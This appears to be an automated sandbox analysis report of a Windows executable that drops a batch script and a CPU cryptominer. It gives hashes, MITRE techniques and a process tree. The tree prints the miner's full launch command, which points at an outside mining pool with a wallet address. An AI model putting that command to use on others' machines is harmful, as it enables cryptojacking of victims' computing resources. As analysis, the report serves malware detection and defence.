73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
22/02/2024, 15:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5372	b2e.exe
404	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
404	cpuminer-sse2.exe
404	cpuminer-sse2.exe
404	cpuminer-sse2.exe
404	cpuminer-sse2.exe
404	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4216-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4216 wrote to memory of 5372	4216	batexe.exe	88
PID 4216 wrote to memory of 5372	4216	batexe.exe	88
PID 4216 wrote to memory of 5372	4216	batexe.exe	88
PID 5372 wrote to memory of 5564	5372	b2e.exe	89
PID 5372 wrote to memory of 5564	5372	b2e.exe	89
PID 5372 wrote to memory of 5564	5372	b2e.exe	89
PID 5564 wrote to memory of 404	5564	cmd.exe	92
PID 5564 wrote to memory of 404	5564	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4216
- C:\Users\Admin\AppData\Local\Temp\5227.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5227.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5227.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\54B7.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5564
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5227.tmp\b2e.exe

Filesize
11.8MB

MD5
a132b15ca428dd9af883c530355ef778

SHA1
bfb8de637f523aa2c1aa2031f5446fae8040e857

SHA256
d26d6611457d0ee7bcf19cfb11161a1dc4513e7d54a058441e12068d454507df

SHA512
cb12dd3f84aa6947015b295abdf89b65124b9217fb466ecf6441dd139289408adbb78473a007f2b4d215b46aa19df4a1dc566b087acb4b9082e5391010e8f8a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\5227.tmp\b2e.exe

Filesize
5.6MB

MD5
f87a5a52a7840d77e77152d0a560ddf0

SHA1
c9d7db30d1d713988b50dd637a6e7ad03ab45786

SHA256
917c3585a396f6063fb801cea7ab3d4793e89243c4de2e1cd2b96921dbb05b10

SHA512
15fafc27204ccca1f147845c2efc366f29e0a27dec67e934467757413bdb5ea7288221c0fae6678d69e1c7c58a83fac828d17f5eb76637469dbd7dcdce1fc1a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\5227.tmp\b2e.exe

Filesize
6.2MB

MD5
1c767a6d35a11a32aacaba9f82c3abe9

SHA1
5f155a280048b89ab160aaf314a0155ca9100bf1

SHA256
674b3faa81e977a38eba462d7a564efa2933998af60a3904a637adacc68053df

SHA512
f26bf05d75f847e7acab17f378269175acd7ff47709be90ef2771812bd4c10f1c11b8c4f3be7af9a50b2c060313db429fc17c2d77d66dfdc387a1a58ccba11d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\54B7.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.4MB

MD5
53f8243e1aaf91f00025d66423a4a206

SHA1
654344c5e90e6bc5ad65980b906e2d002d6a9af0

SHA256
ddf7b58baf1e0449edf35c5f5bcdee4646257c63a07c34b19d6c478d0652d9b2

SHA512
ed369b47bf0d9b50c680c1a7b29348c9bf14068d5226e237a0b2c902b7f2b6f4405b89b3ea1826b2020098f068b2d159e8c7659ae3680fd86ef12c5cfe256598

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.4MB

MD5
2ef40d5c3b964c66392be6a3db51bf84

SHA1
391a644aa11504129db4b42007b054f2c3bf5414

SHA256
0ef835e2576ba8fbfcd733a66284579607cc8dafdc2b26fe3c0091dc66d8e707

SHA512
0b568c8b5ef88af49c00801cd5eaf3e7262367d2a3356f1a685d36e3c1dff63babb5dd049d5a1e7fbe214cab35e6f271d0a105e073a1fb2c281bb5c0279b7107

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
0dd0b6a9679b16d7088116043505be33

SHA1
15ddeb889011c7f358ccfaa05134c37493e3b31f

SHA256
0c473139c4b8cd2ffb967f0f1922aaa678f38ce29cd38caab3fb36d31fae1a8b

SHA512
f99b72d1232792367cc68098e53eff24752780638caff27edd21ae80a20e0c1c85d7c282a1e63c29523461618f10ac5ff92c24c3caa6b77a8dd96ef4bb5bffb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.3MB

MD5
c0883b3eff55c8178c4ab9f87a344e92

SHA1
d66d0fef7a62deec39d3e7e5bf7ae1be1f5b07e6

SHA256
f1eba2523b67404470005593173899f89b6fb3dbf9b1f6ed74b194a9f459cc5a

SHA512
9148dbec9d8981722fdf1ea5ecc03254bd93df0c1b19e611b7dd1486285e04bfe3a5abf843e4c433bd75a12df4b4f80d13f99ec254badf7d32588d29f4076537

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
ae6d25bb867a65dd87de856fe2cddab5

SHA1
4bdb2b15a9608551f99c989b7e6726f7f74ad72d

SHA256
59a3ad6605a3a88ad68886cbf3c1ed245ae51a1f7d2e5ea4b243be132543bfc1

SHA512
bd5bc33b62a67ef64a4cf2b2466b4b5dcb6773b1ac63e875dc909bc7760b8ebda9bc774434c65811db8e0172307c4fe848f26dfc79f0019a44e4e084f3e67d06

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
891KB

MD5
831dd9a2f32fe8e9237eb7bf96f4ad0a

SHA1
346c221d37e1b8148e5003e3b8289f9dd83d92dc

SHA256
6915fb2a50f5f8c66cd955b2f6adce995d11e051c6920c4dcd87ab522e765e25

SHA512
8961dc4ebad390c05ca8fedc45ddaa07ac525b4eb4c7155c0a8e90b8739f4ae35b2aa4e799caa558da9570ae710e2551d22909efd798e8e2d8602910d9f6da10

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/404-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/404-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-46-0x0000000072700000-0x0000000072798000-memory.dmp

Filesize
608KB

Download
memory/404-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/404-47-0x00000000010A0000-0x0000000002955000-memory.dmp

Filesize
24.7MB

Download
memory/404-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/404-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4216-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5372-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5372-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download